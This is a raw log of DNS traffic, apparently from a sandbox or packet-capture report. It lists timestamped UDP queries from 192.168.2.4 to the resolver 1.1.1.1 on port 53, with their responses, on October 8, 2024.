                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.846812963 CEST5561953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.854667902 CEST53556191.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.511866093 CEST5779753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.520008087 CEST53577971.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.003350973 CEST5733053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.011852980 CEST53573301.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.049097061 CEST5964753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.057868958 CEST53596471.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.302362919 CEST6020553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.310770035 CEST53602051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.373214006 CEST5432853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.380857944 CEST53543281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.867098093 CEST5977953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.875766039 CEST53597791.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.637340069 CEST5472253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.646404982 CEST53547221.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.949809074 CEST5253853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.957355976 CEST53525381.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.018102884 CEST6004653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.026134014 CEST53600461.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.836361885 CEST6527853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.845635891 CEST53652781.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.960124969 CEST6040353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:34.967751026 CEST53604031.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.318151951 CEST6222153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.325953007 CEST53622211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.642137051 CEST5005453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:35.650608063 CEST53500541.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.093384027 CEST6054053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.101468086 CEST53605401.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.350261927 CEST5101453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.358258009 CEST53510141.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.590718031 CEST5521253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.598140955 CEST53552121.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.491027117 CEST5665953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.499947071 CEST53566591.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.502043009 CEST5860753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.509099960 CEST53586071.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.258397102 CEST5861153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.268737078 CEST53586111.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.557528019 CEST4999253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.739177942 CEST53499921.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.021591902 CEST6329853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.029505968 CEST53632981.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.519099951 CEST5083453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.527285099 CEST53508341.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.730140924 CEST5568453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.737786055 CEST53556841.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.053611040 CEST6433653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.061403036 CEST53643361.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.588937998 CEST5566853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.597419977 CEST53556681.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.603444099 CEST5842153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.611725092 CEST53584211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.405755043 CEST5037053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.414376974 CEST53503701.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.734704018 CEST5292953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.742618084 CEST53529291.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.275115967 CEST6118853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.282615900 CEST53611881.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.449971914 CEST5213153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.458024979 CEST53521311.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.876812935 CEST6329253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.884025097 CEST53632921.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.253360987 CEST6503753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.261286020 CEST53650371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.367043018 CEST5810453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.374773979 CEST53581041.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.394768000 CEST4960953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.402045965 CEST53496091.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.643351078 CEST5842353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.907013893 CEST53584231.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.370292902 CEST6458553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.422475100 CEST53645851.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.062542915 CEST5847453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.072500944 CEST53584741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.305742979 CEST6403553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.313606024 CEST53640351.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.834331989 CEST5685053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.014929056 CEST53568501.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.213774920 CEST5048753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.371920109 CEST5900453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.642077923 CEST53504871.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.642086983 CEST53590041.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.469265938 CEST5393953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.477194071 CEST53539391.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.588587046 CEST6180453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.685930967 CEST53618041.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.478199959 CEST6182353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.487108946 CEST53618231.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.127726078 CEST5357153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.145297050 CEST5357153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.279155970 CEST53535711.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.279191017 CEST53535711.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.008994102 CEST5794853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.017364025 CEST53579481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.247271061 CEST5941253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.270977974 CEST5941253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.429665089 CEST53594121.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.429682016 CEST53594121.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.038657904 CEST5660553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.068919897 CEST5660553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.267066956 CEST53566051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.267091036 CEST53566051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.388348103 CEST5382753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.396401882 CEST53538271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.894006968 CEST5531953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.902245045 CEST53553191.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.480323076 CEST6130853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.488837957 CEST53613081.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.202472925 CEST4936053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.211448908 CEST53493601.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.045087099 CEST5255453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.067276001 CEST5255453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.294387102 CEST53525541.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.294405937 CEST53525541.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.160675049 CEST6514653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.170397043 CEST53651461.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.149418116 CEST5374753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.157155037 CEST53537471.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.690341949 CEST6233653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.698559999 CEST53623361.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.747225046 CEST5452553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.754949093 CEST53545251.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.325552940 CEST6287053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.332644939 CEST53628701.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.333462954 CEST5736653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.340930939 CEST53573661.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.236162901 CEST4926553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.257669926 CEST4926553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.430032015 CEST5773253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.449840069 CEST53492651.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.451421976 CEST53492651.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.457879066 CEST5773253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.582195044 CEST53577321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.582214117 CEST53577321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.950795889 CEST5067153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.958690882 CEST53506711.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.178881884 CEST5011753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.189076900 CEST53501171.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.702183962 CEST6333753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.710712910 CEST53633371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.210357904 CEST6316853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.238995075 CEST6316853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.404294968 CEST53631681.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.404335976 CEST53631681.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.671211958 CEST5701153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.679826975 CEST53570111.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.415429115 CEST5904953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.423347950 CEST53590491.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.748653889 CEST4978753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.756195068 CEST53497871.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.450957060 CEST5153053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.459042072 CEST53515301.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.356120110 CEST6099553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.365204096 CEST53609951.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.373310089 CEST5050153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.380871058 CEST53505011.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.836406946 CEST5300253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.844377995 CEST53530021.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:08.014857054 CEST5946453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:08.023073912 CEST53594641.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:08.316493988 CEST5928353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:08.324904919 CEST53592831.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.157902956 CEST5266153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.189524889 CEST5266153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.300026894 CEST53526611.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.300050974 CEST53526611.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.747030973 CEST5950653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.773009062 CEST5950653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.851672888 CEST53595061.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.851721048 CEST53595061.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.201862097 CEST6261553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.209791899 CEST53626151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.324254036 CEST5454853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.348458052 CEST5454853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.419677973 CEST53545481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.419797897 CEST53545481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.911639929 CEST6415453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.919450998 CEST53641541.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.184242010 CEST5937453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.191695929 CEST53593741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.790656090 CEST5301553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.818725109 CEST5301553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.883533955 CEST53530151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.883570910 CEST53530151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:13.071192026 CEST6279553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:13.078691006 CEST53627951.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:13.491797924 CEST5064153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:13.511759996 CEST53506411.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:13.867744923 CEST6238353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:13.876818895 CEST53623831.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.328155994 CEST6104753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.337467909 CEST53610471.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.878613949 CEST5120253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.888361931 CEST53512021.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.659229994 CEST5505653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.666527033 CEST53550561.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.675129890 CEST5545353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.682542086 CEST53554531.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.179923058 CEST5480853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.181010008 CEST5482853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.187130928 CEST53548081.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.189021111 CEST53548281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.661375999 CEST5129153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.692615986 CEST5129153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.846589088 CEST53512911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.846605062 CEST53512911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.927440882 CEST5321853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.935554028 CEST53532181.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.936163902 CEST5682153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.943367958 CEST53568211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:18.326968908 CEST5237753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:18.334948063 CEST53523771.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:18.687215090 CEST5735853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:18.696737051 CEST53573581.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.180896997 CEST5577053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.198524952 CEST53557701.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.712219000 CEST5306053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.739110947 CEST5306053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.808171034 CEST53530601.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.808439016 CEST53530601.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.935528040 CEST6258053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.957787037 CEST6258053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:20.973753929 CEST6258053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.078119040 CEST53625801.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.078172922 CEST53625801.1.1.1192.168.2.4
